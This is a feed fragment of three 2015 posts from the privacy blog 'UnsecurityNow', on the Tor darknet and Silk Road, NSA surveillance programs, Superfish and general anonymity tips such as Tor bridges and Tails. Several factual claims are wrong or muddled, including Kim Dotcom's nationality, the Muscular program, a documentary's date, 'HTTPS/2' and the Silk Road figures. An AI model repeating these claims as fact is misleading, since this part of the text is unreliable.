&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutHKoiwT5Nd-bCKD9ERaDpdis3Olc4hQG2eOHBXUZYd-3TNmBkNm749ogRy9tbDM1Gsug7dvRNMhBY3tMx2nLH3Yvz5Um9OTDnHYCOedpFXJv27ND2IjEHvsiL7Mu83bJfcSj7GD9iiQk/s1600/deep-web-sized.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhutHKoiwT5Nd-bCKD9ERaDpdis3Olc4hQG2eOHBXUZYd-3TNmBkNm749ogRy9tbDM1Gsug7dvRNMhBY3tMx2nLH3Yvz5Um9OTDnHYCOedpFXJv27ND2IjEHvsiL7Mu83bJfcSj7GD9iiQk/s1600/deep-web-sized.jpg&quot; height=&quot;426&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
One of the reasons governments cannot shut down the deepweb entirely is that governments also use it to hide their activities and make them more anonymous in order to avoid infiltration, eavesdropping and data leaks. As with anything in this world, a tool which is used for the good of humanity can and always will be used for evil as well. Even though there are tons and tons of criminal activities in the deepweb and lots of them are being shut down, such as &quot;The Silk Road v1 and v2&quot;, it is impossible to shut them all down at once without bringing down the Tor network.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;The Repercussion: In Numbers&lt;/u&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ce1_lMFaJ-PHxYen1BbI5NoA_caBcU7BNyh8wp9WTzJ_SxkvFUH-yZS4DL0OeBxmtmmQVZcyLCQOcRzU98pjwSO_wdfB8OWdA-MXz4WkelusyXvB3g910G4P7CPgwObPMhEhgYYCOjSO/s1600/bitcoin-stock.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj6ce1_lMFaJ-PHxYen1BbI5NoA_caBcU7BNyh8wp9WTzJ_SxkvFUH-yZS4DL0OeBxmtmmQVZcyLCQOcRzU98pjwSO_wdfB8OWdA-MXz4WkelusyXvB3g910G4P7CPgwObPMhEhgYYCOjSO/s1600/bitcoin-stock.jpg&quot; height=&quot;370&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
Since the military, governments, navy, air force and secret societies also use the I2P and Tor networks to hide their daily &quot;secret&quot; activities, it would be a total loss for all of them if they shut it down. Governments always try to keep control of the darknet by shutting down the most popular sites with criminal content, but they re-open soon after with a new random .onion address, or better yet, a mirror somewhere else. The repercussion, however, was small compared with the profit. For example, The Silk Road v2 had approximately 1 million members and was making 1.2 billion in yearly profit. When the Silk Road was shut down by the F.B.I. on November 5, 2014, they seized about 26,000 bitcoins (equivalent to 4 million U.S. dollars at that time). Bitcoin is the anonymous form of purchasing services and goods in black markets through the darknet. It is listed as BTC on the stock exchange and now (as of April 6, 2015) it is worth &lt;span style=&quot;word-break: break-all;&quot;&gt;258.19 &lt;/span&gt;U.S. Dollars. Surprisingly, Silk Road&#39;s operator made $80 million in commissions from its members. When the Silk Road re-opened, its value went to 3 times what it was worth, both in members and financially. &lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Net neutrality and Last Thoughts&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
After the EFF&#39;s win on net neutrality on March 12, 2015, ISPs and cable companies lost a lot of control over their clients, but since they lost the battle (but not the war) they are finding new ways to suppress their clients&#39; browsing actions that are not covered by the Net Neutrality rules. For example, Comcast is currently performing DPI (deep packet inspection) to ensure they can alert governments (if asked) if a customer is using Tor.&amp;nbsp; Since they deeply analyze their customers&#39; packets, they can determine who is using Tor and who isn&#39;t. One easy (but not bulletproof) way to avoid this is to use &lt;a href=&quot;https://bridges.torproject.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Tor Bridges&lt;/a&gt;. Since Tor relays are indexed by the Tor network, if Comcast (or another ISP) has access to this list, they can easily determine who is using Tor and block access to it so the customer cannot access any site through it.&amp;nbsp; By using bridges, they cannot determine if their customer is using Tor because the bridge address is not listed as &quot;public&quot; in the Tor network, thus they cannot discern between a Tor and a non-Tor connection. They just don&#39;t know what it is. Bridges are being used in highly oppressive countries such as China, Hong Kong, Libya, Egypt, Lebanon, Syria, etc. to bypass their government firewalls.&amp;nbsp; People there also use Proxy Chains, which link their connections and bounce them through a series of proxies to anonymize traffic even further.&lt;br /&gt;
&lt;br /&gt;
Additionally, you can use a VPN with Tor and Bridges to ensure more layers of anonymity, since solely using Tor does NOT guarantee 100% anonymity.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFuIAEq1SD3OJv2do8JweayuT3CEBqWCOZ8ZWMie1xzbd2Lk2QlHjokOIgrX2zR9f_kVkhUltWemN4FxBjHiGEudIYhyJ9xsx1IZ2uCN0F-4eSbuGboO9bhjWuKWZ8qUe4yasGS5KBGKKY/s1600/screen-shot-2011-07-20-at-1-33-53-pm.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFuIAEq1SD3OJv2do8JweayuT3CEBqWCOZ8ZWMie1xzbd2Lk2QlHjokOIgrX2zR9f_kVkhUltWemN4FxBjHiGEudIYhyJ9xsx1IZ2uCN0F-4eSbuGboO9bhjWuKWZ8qUe4yasGS5KBGKKY/s1600/screen-shot-2011-07-20-at-1-33-53-pm.png&quot; height=&quot;400&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
With the emergence of a new, faster (even more controlled) Internet and a free Internet such as Kim Dotcom&#39;s &lt;a href=&quot;http://thehackernews.com/2015/02/meganet-decentralized-internet.html&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;MegaNet&lt;/a&gt;, it is hard to conclude that Tor will live long enough to see our end of times.&amp;nbsp; Perhaps a less centralized, non-IP-address-based network will be used by Freedom Fighters while the rest of civilization uses a faster but more controlled (and censored) Internet like the emerging Internet v2, which is already in progress and perhaps will be using HTTPS/2 (founded by Google).&amp;nbsp; It will soon be a matter of speed and reliability vs privacy. The decision, hopefully, will be ours to make.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;u&gt;&lt;b&gt;Sources:&lt;/b&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href=&quot;http://dafoster.net/articles/2013/04/21/exploring-onionland-the-tor-onion-darknet/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Exploring Onionland: The tor .onion Darknet&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.thewindowsclub.com/darknet-deepnet&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;DarKnet or DeepNet: What is it and how to access it?&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.npr.org/blogs/alltechconsidered/2014/05/25/315821415/going-dark-the-internet-behind-the-internet&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Going Dark: The Internet Behind The Internet&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://deepweblinks.org/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;Deep Web Links&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;http://www.usatoday.com/story/news/nation/2013/10/21/fbi-cracks-silk-road/2984921/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;How FBI brought down cyber-underworld site Silk Road&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://www.google.com/search?q=BTC&amp;amp;ie=utf-8&amp;amp;oe=utf-8&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;BTC in Dollars - Current Stock Price&lt;/a&gt;&lt;br /&gt;
&lt;a href=&quot;https://www.eff.org/deeplinks/2015/03/todays-net-neutrality-order-win-few-blemishes&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;EFF wins over Net Neutrality&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;</description><link>https://unsecuritynow.blogspot.com/2015/03/meet-hidden-web.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWctaZnWRFjdjKCttWgDhLUGne4bWe7yCOwvNBskb9UOIXADFHcjUmltDvwpifRgVWXOCg5OZ8XQzuMfHy4BKxr6sZu01Uc78v8B_csUjJAp0jjdbAJLR5RUXhWA2F0sVcUWtTxzP5VnuQ/s72-c/anonymity-darknets-and-staying-out-federal-custody-part-one-deep-web.w654.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-5754580289069974295</guid><pubDate>Sat, 14 Mar 2015 03:41:00 +0000</pubDate><atom:updated>2015-03-22T15:44:09.206-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">cat-mouse</category><category domain="http://www.blogger.com/atom/ns#">DRAM</category><category domain="http://www.blogger.com/atom/ns#">dystopia</category><category domain="http://www.blogger.com/atom/ns#">governments</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">iphone</category><category domain="http://www.blogger.com/atom/ns#">knowledge</category><category domain="http://www.blogger.com/atom/ns#">Linux</category><category domain="http://www.blogger.com/atom/ns#">nsa</category><category domain="http://www.blogger.com/atom/ns#">phone</category><category domain="http://www.blogger.com/atom/ns#">privacy</category><category domain="http://www.blogger.com/atom/ns#">radar</category><category domain="http://www.blogger.com/atom/ns#">satellites</category><category domain="http://www.blogger.com/atom/ns#">search engines</category><category domain="http://www.blogger.com/atom/ns#">security</category><category domain="http://www.blogger.com/atom/ns#">snowden</category><category domain="http://www.blogger.com/atom/ns#">software</category><category 
domain="http://www.blogger.com/atom/ns#">surveillance</category><category domain="http://www.blogger.com/atom/ns#">vulnerability</category><category domain="http://www.blogger.com/atom/ns#">windows</category><title>Keeping yourself off of the Radar of the NSA. Only fiction? Part 2</title><description>Our privacy diminishes every day, and the facts stated in part 1 of &quot;Keeping Yourself Off the Radar of the NSA&quot; are only the tip of this huge iceberg.&amp;nbsp; The recommendation I gave in part 1 was to use Tails, even though it is not bullet-proof and the person who has the most knowledge wins in this cat and mouse game.&amp;nbsp; In part 2, we will go through more risks, which increase every day while getting more complex as well.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPx5wGNlaSnFEN6Cjr4ZE-1wfoOWj0enW7SgCoMk_FnHGU8kE8lKdFHBn4fPpLuPvAe9Ya_FjMfbNuyYRofV4rl9Gz6cp972zsJdSLts4Gg1hhokcT12DgGe1WJ-4wPjFXN8IWJgV41aN/s1600/privacy.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPx5wGNlaSnFEN6Cjr4ZE-1wfoOWj0enW7SgCoMk_FnHGU8kE8lKdFHBn4fPpLuPvAe9Ya_FjMfbNuyYRofV4rl9Gz6cp972zsJdSLts4Gg1hhokcT12DgGe1WJ-4wPjFXN8IWJgV41aN/s1600/privacy.jpg&quot; height=&quot;426&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
This week, we found out not only about software surveillance but also about hardware and network-based data mining by big and wealthy corporations, as well as the net neutrality law which, by the way, temporarily won the battle but certainly not the war. &lt;br /&gt;
&lt;br /&gt;
Last week, we found out about a vulnerability on Linux systems that takes advantage of physical DRAM memory chips to gain kernel access to the system.&amp;nbsp; We also found out how Apple is sending the voice recordings consumers send to &quot;Siri&quot;, the iPhone Intelligent Personal Assistant, to third-party companies for advertisement and other undocumented purposes. &lt;br /&gt;
&lt;br /&gt;
Further, last week we found out that certain phones such as the Xiaomi Mi 4 are preloaded with malware in the manufacturer&#39;s custom ROM, which the manufacturer then denied, stating that those phones were fake replicas.&amp;nbsp; But don&#39;t worry, not all news is bad news with regard to surveillance.&amp;nbsp; Earlier this year, we also found out about new ways to make it harder for governments and corporations to track our digital fingerprints.&amp;nbsp; The British multi-millionaire Kim Dotcom not only invented a secure end-to-end encrypted way to chat with your friends, but he is also now inventing a new non-IP based &quot;Internet&quot; called &quot;MegaNet&quot; which, he states, will defy the whole surveillance essence.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhagP7ygsERjyN09tE7u_Gx47Uhyphenhyphen4znYQc_zKSozjmN2ZF6KqxAGDF1BnaPHlX6G6sVjxm6G4to1LGnP1DIbBLqeR0AQK__ULm7brXVHC3ok_diEkfwws2UNKykO8f1fqFQ5dXikwlc4eCP/s1600/meganet-decentralized-anonymous-network.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhagP7ygsERjyN09tE7u_Gx47Uhyphenhyphen4znYQc_zKSozjmN2ZF6KqxAGDF1BnaPHlX6G6sVjxm6G4to1LGnP1DIbBLqeR0AQK__ULm7brXVHC3ok_diEkfwws2UNKykO8f1fqFQ5dXikwlc4eCP/s1600/meganet-decentralized-anonymous-network.jpg&quot; height=&quot;394&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
But this is not the only attempt to defy tyrannical global spies.&amp;nbsp; There are also other systems currently in Beta testing that will be used to form their own Internet and share information as freely as people want, because, after all, information should be free for the world to use, manipulate and see however they would like, as long as there is no harm to others.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-FnvemsT5fOepTHLKFTPbEJuy3Qcmob9JekmUQsX_UImfoGM2QrchJf7QhL49aOm932jbU890lsqkZsItTeZc4sQqblm1IPFbdHSEP35j3YXNr5o860RkQysS0WyWkPUqR71x7tfgBH-H/s1600/satellite.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj-FnvemsT5fOepTHLKFTPbEJuy3Qcmob9JekmUQsX_UImfoGM2QrchJf7QhL49aOm932jbU890lsqkZsItTeZc4sQqblm1IPFbdHSEP35j3YXNr5o860RkQysS0WyWkPUqR71x7tfgBH-H/s1600/satellite.jpg&quot; height=&quot;466&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
If you watched documentaries such as &quot;Track me if you can&quot; and &quot;Terms and Conditions May Apply&quot; (2003), you will realize that we have little or no control over our privacy. There are even secret programs out there that can track our identity just by finding our walking pattern. How, then, are we safe from prying eyes?&lt;br /&gt;
&lt;br /&gt;
From hardware, to software to global surveillance to secret programs to track people and break our privacy, we are in a dystopian world where our only weapon is knowledge.</description><link>https://unsecuritynow.blogspot.com/2015/03/keeping-yourself-off-of-radar-of-nsa.html</link><author>noreply@blogger.com (UnsecurityNow)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXPx5wGNlaSnFEN6Cjr4ZE-1wfoOWj0enW7SgCoMk_FnHGU8kE8lKdFHBn4fPpLuPvAe9Ya_FjMfbNuyYRofV4rl9Gz6cp972zsJdSLts4Gg1hhokcT12DgGe1WJ-4wPjFXN8IWJgV41aN/s72-c/privacy.jpg" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-8567398124063555856.post-437538477166632466</guid><pubDate>Sat, 07 Mar 2015 02:59:00 +0000</pubDate><atom:updated>2015-03-09T21:13:30.094-05:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">adware</category><category domain="http://www.blogger.com/atom/ns#">Blog</category><category domain="http://www.blogger.com/atom/ns#">china</category><category domain="http://www.blogger.com/atom/ns#">cyberwar</category><category domain="http://www.blogger.com/atom/ns#">governments</category><category domain="http://www.blogger.com/atom/ns#">greenwald</category><category domain="http://www.blogger.com/atom/ns#">hacking</category><category domain="http://www.blogger.com/atom/ns#">HTTPS</category><category domain="http://www.blogger.com/atom/ns#">lenovo</category><category domain="http://www.blogger.com/atom/ns#">nsa</category><category domain="http://www.blogger.com/atom/ns#">security</category><category domain="http://www.blogger.com/atom/ns#">snowden</category><category domain="http://www.blogger.com/atom/ns#">superfish</category><category domain="http://www.blogger.com/atom/ns#">surveillance</category><category domain="http://www.blogger.com/atom/ns#">vulnerability</category><category 
domain="http://www.blogger.com/atom/ns#">windows</category><title>Keeping yourself off of the Radar of the NSA. Only fiction? Part 1</title><description>&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwu6wSS0CJH2dal2y2WzXAeC7enmx_xu3ydNQUTv3hm28kHjNwm5XeM03yMF6zM1MG-gxVFB15nJGsrBBlGgEXEWGsg9EXYxjsgGkJWU7HlsbzjJGvyJfBTlgzJnWW0bs0-1jRk0DrlvN/s1600/radar.jpeg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPwu6wSS0CJH2dal2y2WzXAeC7enmx_xu3ydNQUTv3hm28kHjNwm5XeM03yMF6zM1MG-gxVFB15nJGsrBBlGgEXEWGsg9EXYxjsgGkJWU7HlsbzjJGvyJfBTlgzJnWW0bs0-1jRk0DrlvN/s1600/radar.jpeg&quot; height=&quot;483&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
What if I told you that it is almost (if not completely) impossible to keep yourself off Big Brother&#39;s radar?&amp;nbsp; What if I told you that even if you take the most paranoid precautions, you are still caught in the net along with the other fish? What if I told you that everything you have found out, everything you know about keeping yourself more secure, is totally useless and that you are hopeless when it comes to keeping your data and digital footprints safe? Well, let&#39;s dive into some facts...&lt;br /&gt;
&lt;br /&gt;
Last year I published a &lt;a href=&quot;http://unsecuritynow.blogspot.com/2014/07/how-to-better-your-privacy.html&quot; target=&quot;_blank&quot;&gt;blog post&lt;/a&gt; on how to keep yourself more secure on the net and in physical (&quot;real&quot;) life.&amp;nbsp; You should know that by the time I published that post with solutions for bettering your privacy, more than a few of Snowden&#39;s revelations had surfaced, even to the most naive people&#39;s eyes. The first thing you should know is that this is a cat-and-mouse game. This means that while the cat (the NSA, for example) is trying to find new ways to push surveillance and autonomous systems to keep track of every single move we make, the mice (freedom fighters and originalists) are sneakily moving forward, finding new ways to keep their privacy a little more... private.&lt;br /&gt;
&lt;br /&gt;
Edward Snowden, who is now a refugee, along with the American journalist Glenn Greenwald, revealed some (no longer) confidential U.S. Government files which pointed out the fact that we, as living beings in this world, are not free anymore.&amp;nbsp; Facing a huge radar and an unstoppable ferocity, we have found out from the &lt;a href=&quot;http://www.rottentomatoes.com/m/citizenfour&quot; target=&quot;_blank&quot;&gt;Citizenfour&lt;/a&gt; movie that the U.S. is not the only &quot;evil&quot; in this game. Other countries, such as the U.K., Russia, China, Germany, France, Sweden and Brazil (to name a few), are also joining this dystopia of human surveillance.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwHdC2Q6lO7iJxdW9KVHUbagA7IhK7Gw4NvvjtGhnQoBEoptrQTsnivNTHslYOD1IL2JfP3MO4Lp1IxggLVxgWBt78BFU43z2rKmgt7lDjL384QZhaCqpyoHeqK64UY2iznQCq_RpfTxAN/s1600/citizenfour.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjwHdC2Q6lO7iJxdW9KVHUbagA7IhK7Gw4NvvjtGhnQoBEoptrQTsnivNTHslYOD1IL2JfP3MO4Lp1IxggLVxgWBt78BFU43z2rKmgt7lDjL384QZhaCqpyoHeqK64UY2iznQCq_RpfTxAN/s1600/citizenfour.jpg&quot; height=&quot;432&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: large;&quot;&gt;&lt;u&gt;How everything got changed&lt;/u&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
In the last couple of years we have found out about the &quot;secret&quot; surveillance programs and secret projects the NSA and its partners were (and still are) using, such as &lt;a href=&quot;http://www.vjolt.net/vol6/issue2/v6i2-a10-Jennings.html&quot; target=&quot;_blank&quot;&gt;Carnivore&lt;/a&gt;, &lt;a href=&quot;http://www.theguardian.com/world/2013/jul/31/nsa-top-secret-program-online-data&quot; target=&quot;_blank&quot;&gt;XKeyscore&lt;/a&gt;, &lt;a href=&quot;http://www.theguardian.com/world/2013/jun/08/nsa-prism-server-collection-facebook-google&quot; target=&quot;_blank&quot;&gt;PRISM&lt;/a&gt;, &lt;a href=&quot;http://www.washingtonpost.com/world/national-security/nsa-infiltrates-links-to-yahoo-google-data-centers-worldwide-snowden-documents-say/2013/10/30/e51d661e-4166-11e3-8b74-d89d714ca4dd_story.html&quot; target=&quot;_blank&quot;&gt;Muscular&lt;/a&gt;, &lt;a href=&quot;https://en.wikipedia.org/wiki/Tempora&quot; title=&quot;Tempora&quot;&gt;Tempora&lt;/a&gt; and &lt;a href=&quot;https://en.wikipedia.org/wiki/Project_6&quot; target=&quot;_blank&quot;&gt;Project 6&lt;/a&gt; (to name only a few).&amp;nbsp; We have also now found out what I believe is the worst of the worst.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw2bO34XDlCXQS2Wktqg0O4ummZD-pBBOeuKegZlrNERIP7-niZNaKy0YGuWaJe2OBudOh3stipFCpnVozbOsWf7TW-NUSpz29SBU6jWh-Zy9dCsS4n25aCu9NPx3vqwjXEm_3C_gnKkXS/s1600/PRISM-Companies_1.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgw2bO34XDlCXQS2Wktqg0O4ummZD-pBBOeuKegZlrNERIP7-niZNaKy0YGuWaJe2OBudOh3stipFCpnVozbOsWf7TW-NUSpz29SBU6jWh-Zy9dCsS4n25aCu9NPx3vqwjXEm_3C_gnKkXS/s1600/PRISM-Companies_1.jpg&quot; height=&quot;426&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
For now, the aforementioned projects and programs work at the infrastructure level of networks (by spying on big chunks of data from big pipes), helped by Google, Facebook, Youtube, America Online, etc.&amp;nbsp; We all know how BIG Google is and how they also have access to most of the residential &lt;a href=&quot;http://www.computerworld.com/article/2474851/android-google-knows-nearly-every-wi-fi-password-in-the-world.html&quot; target=&quot;_blank&quot;&gt;wireless passwords of the whole world&lt;/a&gt; via Android phones.&amp;nbsp; Also, through the Muscular program, we found out how the NSA is able to launch an exploit at any computer they want (regardless of the Operating System) in a matter of seconds. So, they have control over everyone&#39;s email, potentially visited sites, potentially personal information, habits (good and bad ones), data, metadata and every single piece of your life via Internet infrastructure and software. But this is enough for the NSA and its partners to have a total and perfectly shaped profile of their citizens, right? .. WRONG!!&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Early last month, we found out that China was putting adware (&lt;a href=&quot;http://www.cnet.com/news/superfish-torments-lenovo-owners-with-more-than-adware/&quot; target=&quot;_blank&quot;&gt;Superfish&lt;/a&gt;) on Lenovo laptops by breaking and impersonating HTTPS certificates; China was also blamed for placing &lt;a href=&quot;http://blog.trendmicro.com/trendlabs-security-intelligence/netis-routers-leave-wide-open-backdoor/&quot; target=&quot;_blank&quot;&gt;backdoors&lt;/a&gt; and &lt;a href=&quot;http://www.theguardian.com/books/2014/may/12/glenn-greenwald-nsa-tampers-us-internet-routers-snowden&quot; target=&quot;_blank&quot;&gt;surveillance software&lt;/a&gt; in routers in the past. Whereas Superfish was software, we are now facing a new model.&amp;nbsp; Not only the NSA but also other governments are using hardware to spy on users without their knowledge.&amp;nbsp; Earlier this month another Snowden revelation made a lot of people&#39;s jaws drop. This time, it was about hiding &quot;special, deletion-proof&quot; &lt;a href=&quot;http://www.huffingtonpost.com/2015/02/16/nsa-computer-spying_n_6694736.html&quot; target=&quot;_blank&quot;&gt;spying software&lt;/a&gt; on the most common hard-drive brands, such as Hitachi, Western Digital, Seagate and Toshiba, among others.&amp;nbsp; This poses a huge risk because now we cannot trust even our own brand new laptops. &lt;br /&gt;
&lt;br /&gt;
Now that we know where we stand, it is fair to ask ourselves: how can I protect myself? Is having a VPN, sitting behind 7 proxies, or using TOR with a vast number of proxy-chains, as well as using a live (read-only) USB drive running a live distro of Tails, secure enough?&lt;br /&gt;
&lt;u&gt;&lt;span style=&quot;font-size: large;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/u&gt;
&lt;u&gt;&lt;span style=&quot;font-size: large;&quot;&gt;The Solution?&lt;/span&gt;&lt;/u&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
One thing we know: this is a cat-and-mouse game and whoever knows more wins.&amp;nbsp; But this is not quite enough. Whoever is faster at staying up to date, develops the most (cryptographically) secure software and has a paranoid (security-conscious) attitude might be ahead of the game.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
What about phones? As we know from the recent news, &lt;a href=&quot;http://www.zdnet.com/article/nsa-gemalto-sim-card-encryption-hack-key-questions/&quot; target=&quot;_blank&quot;&gt;Gemalto encryption keys&lt;/a&gt; were stolen by the NSA and British intelligence, and as we know, cloning SIM cards in order to evade some tracking is illegal in most countries, such as the U.S. and the U.K.&amp;nbsp; How can we protect ourselves, and not only against the big monsters of digital information such as Google, Yahoo, Facebook, etc.? What about the exploits blindly launched by the NSA at our devices? We could have the best firewalls and IDS/IPS, but are they really enough against any government which has the top cryptographic and evasion software in the world?&amp;nbsp; What about defending against spying hardware chipsets and hidden backdoors in our communication equipment, such as routers and perhaps also firewalls?&amp;nbsp; How can we also be safe against phone surveillance now that we know our SIM card data (or metadata) is being watched, analyzed and profiled?&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHvIKzySDbS6nAISH61N1d1fFDmPfUlftDh3pgRYPTuwpO1ouDTn2n_eRV24mUpyyt5Ora9yjQtGOr_9rm8l7LSNyNY4mPMpSEFWy9FTse2RGdA8M3twcifmSPM8VIv1Kc4n5YSvzNeDVh/s1600/no_escape.jpg&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHvIKzySDbS6nAISH61N1d1fFDmPfUlftDh3pgRYPTuwpO1ouDTn2n_eRV24mUpyyt5Ora9yjQtGOr_9rm8l7LSNyNY4mPMpSEFWy9FTse2RGdA8M3twcifmSPM8VIv1Kc4n5YSvzNeDVh/s1600/no_escape.jpg&quot; height=&quot;456&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The only thing I can think of is to be abstinent, and run a live copy of Tails. Remove your hard-drive, disable services (hardware and software) you don&#39;t need,&amp;nbsp; use and maintain your Firewalls, IDS and IPS, use TOR with Proxychains and of course, avoid doing anything stupid online.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;u&gt;Sources:&lt;/u&gt;&lt;/div&gt;
&lt;br /&gt;
